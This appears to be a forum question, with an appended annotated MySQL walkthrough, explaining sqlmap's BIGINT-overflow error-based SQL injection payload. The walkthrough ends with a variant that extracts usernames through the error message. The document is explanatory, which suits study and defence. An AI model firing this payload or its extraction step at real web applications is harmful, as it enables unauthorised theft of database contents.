I am trying the error-based SQL injection technique using SQLMAP. The technique as identified by SQLMAP is
error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
It would be great if someone could help give some clarity on the payload SQLMAP is using.
Payload: web/test?abc='' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- pprs
More specifically, what is happening in this SQL query?
(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))
Update 1:
The formatted query looks like this:
SELECT
    2*(IF((
        SELECT
            *
        FROM
            (
                SELECT
                    CONCAT(0x716b626b71,
                        (
                            SELECT
                                (ELT(9092 = 9092, 1))
                        )
                    , 0x71626b7071, 0x78)
            )
        s), 8446744073709551610, 8446744073709551610))
SELECT (ELT(9092 = 9092, 1))
Query output is 1, as 9092=9092 evaluates to true (i.e. 1) and the ELT function returns the 1st argument, i.e. 1.
So the next sub-query is:
SELECT CONCAT(0x716b626b71, 1, 0x71626b7071, 0x78)
Query output is the concatenated string "qkbkq1qbkpqx" (after converting the hex to a string).
However, the resultant sub-query SELECT * FROM qkbkq1qbkpqx
gives an error saying "Every derived table must have its own alias".
Update 2:
I missed the alias in the query, as @tcadidot0 mentioned. So now the resultant sub-query is:
SELECT * FROM qkbkq1qbkpqx s
And the final query is:
SELECT 2*(IF((SELECT * FROM qkbkq1qbkpqx s), 8446744073709551610, 8446744073709551610))
If the table "qkbkq1qbkpqx" exists, then it returns 8446744073709551610,
else it returns 8446744073709551610.
However, 2 times the result leads to this error: BIGINT value is out of range in '(2 * if((1 > 0),8446744073709551610,8446744073709551610))',
assuming 1>0
is the condition instead of the select statement.
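Added example, not code from the original post or from sqlmap itself: a MySQL session that takes the payload apart one piece at a time so each part can be run and inspected on its own. The table demo_users, its single row and the column name are constructed for illustration; the hex literals, the ELT probe and the 8446744073709551610 constant are exactly those in the posted payload. The markers decode to 'qkbkq' (0x716b626b71), 'qbkpq' (0x71626b7071) and 'x' (0x78), which is where the "qkbkq1qbkpqx" string comes from.

```sql
-- Added example (not part of the original post): dissecting sqlmap's
-- BIGINT error-based payload in MySQL. Table, row and column name are
-- constructed for illustration.
CREATE TABLE demo_users (id INT PRIMARY KEY, username VARCHAR(32));
INSERT INTO demo_users VALUES (1, 'alice');

-- Step 1: the hex literals are only boundary markers. They are binary
-- strings, so CAST them to CHAR to see them as text.
SELECT CAST(0x716b626b71 AS CHAR) AS start_marker,
       CAST(0x71626b7071 AS CHAR) AS end_marker,
       CAST(0x78         AS CHAR) AS tail;

-- Step 2: ELT(index, ...) returns the argument at position index and NULL
-- when index is 0. A comparison evaluates to 1 or 0, so ELT(cond, 1) is a
-- boolean probe: it yields '1' when cond holds and NULL otherwise, and a
-- NULL inside CONCAT makes the whole CONCAT NULL, so the markers vanish.
SELECT ELT(9092 = 9092, 1) AS true_case,
       ELT(9092 = 9093, 1) AS false_case;

-- Step 3: the derived table. "s" is just the alias MySQL requires for an
-- inline one-row, one-column result set. The CONCAT value lives in that
-- column; nothing is looked up by the name qkbkq1qbkpqx.
-- (The result is a binary string because the markers are binary; the
-- MySQL 8.0 client prints such values as hex unless started with
-- --skip-binary-as-hex.)
SELECT * FROM (
  SELECT CONCAT(0x716b626b71, (SELECT ELT(9092 = 9092, 1)), 0x71626b7071, 0x78)
) s;

-- Step 4: the overflow. Both IF branches are the same literal, so the
-- truth value of the condition is irrelevant: 2 * 8446744073709551610
-- exceeds the signed BIGINT maximum 9223372036854775807 and the statement
-- aborts with ER_DATA_OUT_OF_RANGE (1690). The error text echoes the
-- expression that failed, with the constant subquery already folded to its
-- value, so the marker-wrapped string rides back inside the error message.
SELECT 2 * (IF(
  (SELECT * FROM (
     SELECT CONCAT(0x716b626b71, (SELECT ELT(9092 = 9092, 1)), 0x71626b7071, 0x78)
   ) s),
  8446744073709551610, 8446744073709551610));

-- Step 5: extraction. Once the probe above has confirmed that the error is
-- reflected to the client, sqlmap replaces the ELT with the query whose
-- result it wants, and the same error now carries that value between the
-- markers. LIMIT 0,1 selects one row at a time, exactly as sqlmap does.
SELECT 2 * (IF(
  (SELECT * FROM (
     SELECT CONCAT(0x716b626b71,
                   (SELECT username FROM demo_users ORDER BY id LIMIT 0,1),
                   0x71626b7071, 0x78)
   ) s),
  8446744073709551610, 8446744073709551610));
```

Two things worth checking when reproducing this. The error raised by step 4 is the one quoted in Update 2; the difference is that, with the real subquery in place of 1>0, MySQL reports the condition as the folded constant, typically in the form (select 'qkbkq1qbkpqx' from dual), and sqlmap simply matches everything between the two markers. And the whole technique depends on the web application returning the database error text to the client: the `-- pprs` comment at the end of the payload only neutralises the rest of the application's query, it does not create the output channel. If the application logs the error instead of displaying it, this payload still overflows and errors, but nothing is leaked, and sqlmap will fall back to a different technique.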